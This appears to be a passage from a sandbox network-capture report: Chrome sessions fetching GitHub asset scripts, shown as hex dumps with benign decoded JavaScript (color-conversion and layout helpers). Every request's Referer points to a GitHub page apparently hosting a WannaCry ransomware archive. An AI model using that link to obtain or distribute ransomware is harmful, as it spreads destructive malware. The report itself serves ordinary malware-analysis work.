                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 45 6c 65 6d 65 6e 74 4e 53 28 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 22 70 61 74 68 22 29 3b 6d 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 22 2c 22 4d 31 30 20 31 33 61 31 20 31 20 30 20 31 30 30 2d 32 20 31 20 31 20 30 20 30 30 30 20 32 7a 6d 2d 34 20 30 61 31 20 31 20 30 20 31 30 30 2d 32 20 31 20 31 20 30 20 30 30 30 20 32 7a 6d 31 2d 35 61 31 20 31 20 30 20 31 31 2d 32 20 30 20 31 20 31 20 30 20 30 31 32 20 30 7a 6d 33 20 31 61 31 20 31 20 30 20 31 30 30 2d 32 20 31 20 31 20 30 20 30 30 30 20 32 7a 6d 31 2d 35 61 31 20 31 20 30 20 31 31 2d 32 20 30 20 31 20 31 20 30 20 30 31 32 20 30 7a 4d 36 20 35 61 31 20 31 20 30 20 31 30 30 2d 32 20 31 20 31 20 30 20 30 30 30 20 32 7a 22 29 2c 66 2e 63 6f 6e 74
                                                                                      Data Ascii: ElementNS("http://www.w3.org/2000/svg","path");m.setAttribute("d","M10 13a1 1 0 100-2 1 1 0 000 2zm-4 0a1 1 0 100-2 1 1 0 000 2zm1-5a1 1 0 11-2 0 1 1 0 012 0zm3 1a1 1 0 100-2 1 1 0 000 2zm1-5a1 1 0 11-2 0 1 1 0 012 0zM6 5a1 1 0 100-2 1 1 0 000 2z"),f.cont


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      32192.168.2.1649736185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:23 UTC679OUTGET /assets/vendors-node_modules_color-convert_index_js-72c9fbde5ad4.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:23 UTC689INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 13385
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Tue, 24 Oct 2023 17:57:34 GMT
                                                                                      ETag: 0x8DBD4BAB3AB8E38
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:23 GMT
                                                                                      Age: 1484315
                                                                                      X-Served-By: cache-iad-kjyo7100077-IAD, cache-lga21938-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 2724, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 3011d6f7de619c4b538628f5c44930c260c3af33
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 63 6f 6c 6f 72 2d 63 6f 6e 76 65 72 74 5f 69 6e 64 65 78 5f 6a 73 22 5d 2c 7b 34 38 31 36 38 3a 28 65 2c 6e 2c 74 29 3d 3e 7b 6c 65 74 20 72 3d 74 28 33 39 30 39 32 29 2c 6c 3d 7b 7d 3b 66 6f 72 28 6c 65 74 20 65 20 6f 66 20 4f 62 6a 65 63 74 2e 6b 65 79 73 28 72 29 29 6c 5b 72 5b 65 5d 5d 3d 65 3b 6c 65 74 20 61 3d 7b 72 67 62 3a 7b 63 68 61 6e 6e 65 6c 73 3a 33 2c 6c 61 62 65 6c 73 3a 22 72 67 62 22 7d 2c 68 73 6c 3a 7b 63 68 61 6e 6e 65 6c 73 3a 33 2c 6c 61 62 65 6c 73 3a 22 68 73 6c 22 7d 2c 68 73 76 3a 7b
                                                                                      Data Ascii: (globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_color-convert_index_js"],{48168:(e,n,t)=>{let r=t(39092),l={};for(let e of Object.keys(r))l[r[e]]=e;let a={rgb:{channels:3,labels:"rgb"},hsl:{channels:3,labels:"hsl"},hsv:{
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 3d 3d 3d 61 3f 30 3a 75 3c 3d 2e 35 3f 69 2f 28 6f 2b 61 29 3a 69 2f 28 32 2d 6f 2d 61 29 29 2c 31 30 30 2a 75 5d 7d 2c 61 2e 72 67 62 2e 68 73 76 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 6e 2c 74 2c 72 2c 6c 2c 61 3b 6c 65 74 20 6f 3d 65 5b 30 5d 2f 32 35 35 2c 69 3d 65 5b 31 5d 2f 32 35 35 2c 75 3d 65 5b 32 5d 2f 32 35 35 2c 73 3d 4d 61 74 68 2e 6d 61 78 28 6f 2c 69 2c 75 29 2c 68 3d 73 2d 4d 61 74 68 2e 6d 69 6e 28 6f 2c 69 2c 75 29 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 73 2d 65 29 2f 36 2f 68 2b 2e 35 7d 3b 72 65 74 75 72 6e 20 30 3d 3d 3d 68 3f 28 6c 3d 30 2c 61 3d 30 29 3a 28 61 3d 68 2f 73 2c 6e 3d 63 28 6f 29 2c 74 3d 63 28 69 29 2c 72 3d 63 28 75 29 2c 6f 3d 3d 3d 73 3f 6c 3d 72 2d 74 3a 69 3d 3d 3d 73 3f 6c
                                                                                      Data Ascii: ===a?0:u<=.5?i/(o+a):i/(2-o-a)),100*u]},a.rgb.hsv=function(e){let n,t,r,l,a;let o=e[0]/255,i=e[1]/255,u=e[2]/255,s=Math.max(o,i,u),h=s-Math.min(o,i,u),c=function(e){return(s-e)/6/h+.5};return 0===h?(l=0,a=0):(a=h/s,n=c(o),t=c(i),r=c(u),o===s?l=r-t:i===s?l
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 30 2a 28 74 2d 72 29 2c 75 3d 32 30 30 2a 28 72 2d 6c 29 3b 72 65 74 75 72 6e 5b 6f 2c 69 2c 75 5d 7d 2c 61 2e 68 73 6c 2e 72 67 62 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 6e 2c 74 2c 72 3b 6c 65 74 20 6c 3d 65 5b 30 5d 2f 33 36 30 2c 61 3d 65 5b 31 5d 2f 31 30 30 2c 6f 3d 65 5b 32 5d 2f 31 30 30 3b 69 66 28 30 3d 3d 3d 61 29 72 65 74 75 72 6e 5b 72 3d 32 35 35 2a 6f 2c 72 2c 72 5d 3b 6e 3d 6f 3c 2e 35 3f 6f 2a 28 31 2b 61 29 3a 6f 2b 61 2d 6f 2a 61 3b 6c 65 74 20 69 3d 32 2a 6f 2d 6e 2c 75 3d 5b 30 2c 30 2c 30 5d 3b 66 6f 72 28 6c 65 74 20 65 3d 30 3b 65 3c 33 3b 65 2b 2b 29 28 74 3d 6c 2b 2d 28 31 2f 33 2a 28 65 2d 31 29 29 29 3c 30 26 26 74 2b 2b 2c 74 3e 31 26 26 74 2d 2d 2c 72 3d 36 2a 74 3c 31 3f 69 2b 28 6e 2d 69 29 2a 36 2a 74 3a 32 2a
                                                                                      Data Ascii: 0*(t-r),u=200*(r-l);return[o,i,u]},a.hsl.rgb=function(e){let n,t,r;let l=e[0]/360,a=e[1]/100,o=e[2]/100;if(0===a)return[r=255*o,r,r];n=o<.5?o*(1+a):o+a-o*a;let i=2*o-n,u=[0,0,0];for(let e=0;e<3;e++)(t=l+-(1/3*(e-1)))<0&&t++,t>1&&t--,r=6*t<1?i+(n-i)*6*t:2*
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 2a 28 31 2d 6c 29 2b 6c 29 29 2c 32 35 35 2a 28 31 2d 4d 61 74 68 2e 6d 69 6e 28 31 2c 74 2a 28 31 2d 6c 29 2b 6c 29 29 2c 32 35 35 2a 28 31 2d 4d 61 74 68 2e 6d 69 6e 28 31 2c 72 2a 28 31 2d 6c 29 2b 6c 29 29 5d 7d 2c 61 2e 78 79 7a 2e 72 67 62 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 6e 2c 74 2c 72 3b 6c 65 74 20 6c 3d 65 5b 30 5d 2f 31 30 30 2c 61 3d 65 5b 31 5d 2f 31 30 30 2c 6f 3d 65 5b 32 5d 2f 31 30 30 3b 72 65 74 75 72 6e 20 6e 3d 28 6e 3d 33 2e 32 34 30 36 2a 6c 2b 2d 31 2e 35 33 37 32 2a 61 2b 2d 2e 34 39 38 36 2a 6f 29 3e 2e 30 30 33 31 33 30 38 3f 31 2e 30 35 35 2a 6e 2a 2a 28 31 2f 32 2e 34 29 2d 2e 30 35 35 3a 31 32 2e 39 32 2a 6e 2c 74 3d 28 74 3d 2d 2e 39 36 38 39 2a 6c 2b 31 2e 38 37 35 38 2a 61 2b 2e 30 34 31 35 2a 6f 29 3e 2e
                                                                                      Data Ascii: *(1-l)+l)),255*(1-Math.min(1,t*(1-l)+l)),255*(1-Math.min(1,r*(1-l)+l))]},a.xyz.rgb=function(e){let n,t,r;let l=e[0]/100,a=e[1]/100,o=e[2]/100;return n=(n=3.2406*l+-1.5372*a+-.4986*o)>.0031308?1.055*n**(1/2.4)-.055:12.92*n,t=(t=-.9689*l+1.8758*a+.0415*o)>.
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 6f 26 26 28 69 2b 3d 36 30 29 2c 69 7d 2c 61 2e 68 73 76 2e 61 6e 73 69 31 36 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 61 2e 72 67 62 2e 61 6e 73 69 31 36 28 61 2e 68 73 76 2e 72 67 62 28 65 29 2c 65 5b 32 5d 29 7d 2c 61 2e 72 67 62 2e 61 6e 73 69 32 35 36 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 6e 3d 65 5b 30 5d 2c 74 3d 65 5b 31 5d 2c 72 3d 65 5b 32 5d 3b 72 65 74 75 72 6e 20 6e 3d 3d 3d 74 26 26 74 3d 3d 3d 72 3f 6e 3c 38 3f 31 36 3a 6e 3e 32 34 38 3f 32 33 31 3a 4d 61 74 68 2e 72 6f 75 6e 64 28 28 6e 2d 38 29 2f 32 34 37 2a 32 34 29 2b 32 33 32 3a 31 36 2b 33 36 2a 4d 61 74 68 2e 72 6f 75 6e 64 28 6e 2f 32 35 35 2a 35 29 2b 36 2a 4d 61 74 68 2e 72 6f 75 6e 64 28 74 2f 32 35 35 2a 35 29 2b 4d 61 74 68 2e 72 6f 75 6e 64 28
                                                                                      Data Ascii: o&&(i+=60),i},a.hsv.ansi16=function(e){return a.rgb.ansi16(a.hsv.rgb(e),e[2])},a.rgb.ansi256=function(e){let n=e[0],t=e[1],r=e[2];return n===t&&t===r?n<8?16:n>248?231:Math.round((n-8)/247*24)+232:16+36*Math.round(n/255*5)+6*Math.round(t/255*5)+Math.round(
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 31 30 30 2c 74 3d 65 5b 32 5d 2f 31 30 30 2c 72 3d 6e 2a 74 2c 6c 3d 30 3b 72 65 74 75 72 6e 20 72 3c 31 26 26 28 6c 3d 28 74 2d 72 29 2f 28 31 2d 72 29 29 2c 5b 65 5b 30 5d 2c 31 30 30 2a 72 2c 31 30 30 2a 6c 5d 7d 2c 61 2e 68 63 67 2e 72 67 62 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 6e 3d 65 5b 30 5d 2f 33 36 30 2c 74 3d 65 5b 31 5d 2f 31 30 30 2c 72 3d 65 5b 32 5d 2f 31 30 30 3b 69 66 28 30 3d 3d 3d 74 29 72 65 74 75 72 6e 5b 32 35 35 2a 72 2c 32 35 35 2a 72 2c 32 35 35 2a 72 5d 3b 6c 65 74 20 6c 3d 5b 30 2c 30 2c 30 5d 2c 61 3d 6e 25 31 2a 36 2c 6f 3d 61 25 31 2c 69 3d 31 2d 6f 2c 75 3d 30 3b 73 77 69 74 63 68 28 4d 61 74 68 2e 66 6c 6f 6f 72 28 61 29 29 7b 63 61 73 65 20 30 3a 6c 5b 30 5d 3d 31 2c 6c 5b 31 5d 3d 6f 2c 6c 5b 32 5d 3d 30 3b
                                                                                      Data Ascii: 100,t=e[2]/100,r=n*t,l=0;return r<1&&(l=(t-r)/(1-r)),[e[0],100*r,100*l]},a.hcg.rgb=function(e){let n=e[0]/360,t=e[1]/100,r=e[2]/100;if(0===t)return[255*r,255*r,255*r];let l=[0,0,0],a=n%1*6,o=a%1,i=1-o,u=0;switch(Math.floor(a)){case 0:l[0]=1,l[1]=o,l[2]=0;
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 6f 6e 28 65 29 7b 6c 65 74 20 6e 3d 32 35 35 26 4d 61 74 68 2e 72 6f 75 6e 64 28 65 5b 30 5d 2f 31 30 30 2a 32 35 35 29 2c 74 3d 28 28 6e 3c 3c 31 36 29 2b 28 6e 3c 3c 38 29 2b 6e 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 22 30 30 30 30 30 30 22 2e 73 75 62 73 74 72 69 6e 67 28 74 2e 6c 65 6e 67 74 68 29 2b 74 7d 2c 61 2e 72 67 62 2e 67 72 61 79 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 6e 3d 28 65 5b 30 5d 2b 65 5b 31 5d 2b 65 5b 32 5d 29 2f 33 3b 72 65 74 75 72 6e 5b 6e 2f 32 35 35 2a 31 30 30 5d 7d 7d 2c 31 32 30 38 35 3a 28 65 2c 6e 2c 74 29 3d 3e 7b 6c 65 74 20 72 3d 74 28 34 38 31 36 38 29 2c 6c 3d 74 28 34 31 31 31 29 2c 61 3d 7b 7d 2c 6f 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28
                                                                                      Data Ascii: on(e){let n=255&Math.round(e[0]/100*255),t=((n<<16)+(n<<8)+n).toString(16).toUpperCase();return"000000".substring(t.length)+t},a.rgb.gray=function(e){let n=(e[0]+e[1]+e[2])/3;return[n/255*100]}},12085:(e,n,t)=>{let r=t(48168),l=t(4111),a={},o=Object.keys(
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 61 72 6b 63 79 61 6e 3a 5b 30 2c 31 33 39 2c 31 33 39 5d 2c 64 61 72 6b 67 6f 6c 64 65 6e 72 6f 64 3a 5b 31 38 34 2c 31 33 34 2c 31 31 5d 2c 64 61 72 6b 67 72 61 79 3a 5b 31 36 39 2c 31 36 39 2c 31 36 39 5d 2c 64 61 72 6b 67 72 65 65 6e 3a 5b 30 2c 31 30 30 2c 30 5d 2c 64 61 72 6b 67 72 65 79 3a 5b 31 36 39 2c 31 36 39 2c 31 36 39 5d 2c 64 61 72 6b 6b 68 61 6b 69 3a 5b 31 38 39 2c 31 38 33 2c 31 30 37 5d 2c 64 61 72 6b 6d 61 67 65 6e 74 61 3a 5b 31 33 39 2c 30 2c 31 33 39 5d 2c 64 61 72 6b 6f 6c 69 76 65 67 72 65 65 6e 3a 5b 38 35 2c 31 30 37 2c 34 37 5d 2c 64 61 72 6b 6f 72 61 6e 67 65 3a 5b 32 35 35 2c 31 34 30 2c 30 5d 2c 64 61 72 6b 6f 72 63 68 69 64 3a 5b 31 35 33 2c 35 30 2c 32 30 34 5d 2c 64 61 72 6b 72 65 64 3a 5b 31 33 39 2c 30 2c 30 5d 2c 64 61
                                                                                      Data Ascii: arkcyan:[0,139,139],darkgoldenrod:[184,134,11],darkgray:[169,169,169],darkgreen:[0,100,0],darkgrey:[169,169,169],darkkhaki:[189,183,107],darkmagenta:[139,0,139],darkolivegreen:[85,107,47],darkorange:[255,140,0],darkorchid:[153,50,204],darkred:[139,0,0],da
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 74 65 65 6c 62 6c 75 65 3a 5b 31 37 36 2c 31 39 36 2c 32 32 32 5d 2c 6c 69 67 68 74 79 65 6c 6c 6f 77 3a 5b 32 35 35 2c 32 35 35 2c 32 32 34 5d 2c 6c 69 6d 65 3a 5b 30 2c 32 35 35 2c 30 5d 2c 6c 69 6d 65 67 72 65 65 6e 3a 5b 35 30 2c 32 30 35 2c 35 30 5d 2c 6c 69 6e 65 6e 3a 5b 32 35 30 2c 32 34 30 2c 32 33 30 5d 2c 6d 61 67 65 6e 74 61 3a 5b 32 35 35 2c 30 2c 32 35 35 5d 2c 6d 61 72 6f 6f 6e 3a 5b 31 32 38 2c 30 2c 30 5d 2c 6d 65 64 69 75 6d 61 71 75 61 6d 61 72 69 6e 65 3a 5b 31 30 32 2c 32 30 35 2c 31 37 30 5d 2c 6d 65 64 69 75 6d 62 6c 75 65 3a 5b 30 2c 30 2c 32 30 35 5d 2c 6d 65 64 69 75 6d 6f 72 63 68 69 64 3a 5b 31 38 36 2c 38 35 2c 32 31 31 5d 2c 6d 65 64 69 75 6d 70 75 72 70 6c 65 3a 5b 31 34 37 2c 31 31 32 2c 32 31 39 5d 2c 6d 65 64 69 75 6d 73
                                                                                      Data Ascii: teelblue:[176,196,222],lightyellow:[255,255,224],lime:[0,255,0],limegreen:[50,205,50],linen:[250,240,230],magenta:[255,0,255],maroon:[128,0,0],mediumaquamarine:[102,205,170],mediumblue:[0,0,205],mediumorchid:[186,85,211],mediumpurple:[147,112,219],mediums
                                                                                      2024-03-23 14:47:23 UTC983INData Raw: 35 35 2c 39 39 2c 37 31 5d 2c 74 75 72 71 75 6f 69 73 65 3a 5b 36 34 2c 32 32 34 2c 32 30 38 5d 2c 76 69 6f 6c 65 74 3a 5b 32 33 38 2c 31 33 30 2c 32 33 38 5d 2c 77 68 65 61 74 3a 5b 32 34 35 2c 32 32 32 2c 31 37 39 5d 2c 77 68 69 74 65 3a 5b 32 35 35 2c 32 35 35 2c 32 35 35 5d 2c 77 68 69 74 65 73 6d 6f 6b 65 3a 5b 32 34 35 2c 32 34 35 2c 32 34 35 5d 2c 79 65 6c 6c 6f 77 3a 5b 32 35 35 2c 32 35 35 2c 30 5d 2c 79 65 6c 6c 6f 77 67 72 65 65 6e 3a 5b 31 35 34 2c 32 30 35 2c 35 30 5d 7d 7d 2c 34 31 31 31 3a 28 65 2c 6e 2c 74 29 3d 3e 7b 6c 65 74 20 72 3d 74 28 34 38 31 36 38 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74
                                                                                      Data Ascii: 55,99,71],turquoise:[64,224,208],violet:[238,130,238],wheat:[245,222,179],white:[255,255,255],whitesmoke:[245,245,245],yellow:[255,255,0],yellowgreen:[154,205,50]}},4111:(e,n,t)=>{let r=t(48168);e.exports=function(e){let n=function(e){let n=function(){let


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      33192.168.2.1649737185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:23 UTC734OUTGET /assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index_js-95b84ee6bc34.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:23 UTC684INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 8879
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Tue, 05 Dec 2023 19:17:13 GMT
                                                                                      ETag: 0x8DBF5C6C9ABE518
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:23 GMT
                                                                                      Age: 101032
                                                                                      X-Served-By: cache-iad-kjyo7100150-IAD, cache-ewr18145-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 8, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: b243679d2d37b10d6bf80b7468a9694b10ecc8ed
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 64 69 6d 65 6e 73 69 6f 6e 73 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6a 74 6d 6c 5f 6c 69 62 5f 69 6e 64 65 78 5f 6a 73 22 5d 2c 7b 39 38 31 30 35 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 6c 65 74 20 74 3d 65 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 3b 72 65 74 75 72 6e 7b 74 6f 70 3a 74 2e 74 6f 70
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index_js"],{98105:(e,t,n)=>{function s(e){let t=e.getBoundingClientRect();return{top:t.top
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 6e 63 65 6f 66 20 6f 29 29 72 65 74 75 72 6e 3b 69 3d 69 2e 6f 66 66 73 65 74 50 61 72 65 6e 74 7d 69 66 28 74 26 26 74 21 3d 3d 72 26 26 74 21 3d 3d 72 2e 64 65 66 61 75 6c 74 56 69 65 77 26 26 74 21 3d 3d 72 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 26 26 74 21 3d 3d 72 2e 62 6f 64 79 29 7b 69 66 28 21 28 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 6f 29 29 72 65 74 75 72 6e 3b 6c 3d 74 2c 6e 3d 74 2e 73 63 72 6f 6c 6c 48 65 69 67 68 74 2c 73 3d 74 2e 73 63 72 6f 6c 6c 57 69 64 74 68 7d 65 6c 73 65 7b 76 61 72 20 66 2c 64 3b 6c 3d 61 2c 6e 3d 4d 61 74 68 2e 6d 61 78 28 28 66 3d 72 2e 62 6f 64 79 29 2e 73 63 72 6f 6c 6c 48 65 69 67 68 74 2c 61 2e 73 63 72 6f 6c 6c 48 65 69 67 68 74 2c 66 2e 6f 66 66 73 65 74 48 65 69 67 68 74 2c 61 2e 6f 66 66 73 65 74
                                                                                      Data Ascii: nceof o))return;i=i.offsetParent}if(t&&t!==r&&t!==r.defaultView&&t!==r.documentElement&&t!==r.body){if(!(t instanceof o))return;l=t,n=t.scrollHeight,s=t.scrollWidth}else{var f,d;l=a,n=Math.max((f=r.body).scrollHeight,a.scrollHeight,f.offsetHeight,a.offset
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 2e 67 65 74 28 74 68 69 73 29 7d 73 65 74 20 76 61 6c 75 65 28 65 29 7b 72 2e 73 65 74 28 74 68 69 73 2c 65 7c 7c 22 22 29 2c 69 2e 67 65 74 28 74 68 69 73 29 2e 75 70 64 61 74 65 50 61 72 65 6e 74 28 65 29 7d 67 65 74 20 65 6c 65 6d 65 6e 74 28 29 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 28 74 68 69 73 29 2e 65 6c 65 6d 65 6e 74 7d 67 65 74 20 62 6f 6f 6c 65 61 6e 56 61 6c 75 65 28 29 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 28 74 68 69 73 29 2e 62 6f 6f 6c 65 61 6e 56 61 6c 75 65 7d 73 65 74 20 62 6f 6f 6c 65 61 6e 56 61 6c 75 65 28 65 29 7b 69 2e 67 65 74 28 74 68 69 73 29 2e 62 6f 6f 6c 65 61 6e 56 61 6c 75 65 3d 65 7d 7d 3b 6c 65 74 20 41 74 74 72 69 62 75 74 65 56 61 6c 75 65 53 65 74 74 65 72 3d 63 6c 61 73 73 20 41 74 74 72 69 62 75 74 65 56 61 6c 75
                                                                                      Data Ascii: .get(this)}set value(e){r.set(this,e||""),i.get(this).updateParent(e)}get element(){return i.get(this).element}get booleanValue(){return i.get(this).booleanValue}set booleanValue(e){i.get(this).booleanValue=e}};let AttributeValueSetter=class AttributeValu
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 61 2e 73 65 74 28 74 68 69 73 2c 74 29 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 7b 70 72 6f 63 65 73 73 43 61 6c 6c 62 61 63 6b 28 74 2c 6e 2c 73 29 7b 76 61 72 20 6c 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 26 26 73 29 7b 66 6f 72 28 6c 65 74 20 74 20 6f 66 20 6e 29 69 66 28 74 2e 65 78 70 72 65 73 73 69 6f 6e 20 69 6e 20 73 29 7b 6c 65 74 20 6e 3d 6e 75 6c 6c 21 3d 3d 28 6c 3d 73 5b 74 2e 65 78 70 72 65 73 73 69 6f 6e 5d 29 26 26 76 6f 69 64 20 30 21 3d 3d 6c 3f 6c 3a 22 22 3b 65 28 74 2c 6e 29 7d 7d 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 29 7b 65 2e 76 61 6c 75 65 3d 53 74 72 69 6e 67 28 74 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 62 6f 6f 6c 65 61 6e 22
                                                                                      Data Ascii: a.set(this,t)}};function o(e){return{processCallback(t,n,s){var l;if("object"==typeof s&&s){for(let t of n)if(t.expression in s){let n=null!==(l=s[t.expression])&&void 0!==l?l:"";e(t,n)}}}}}function u(e,t){e.value=String(t)}function c(e,t){return"boolean"
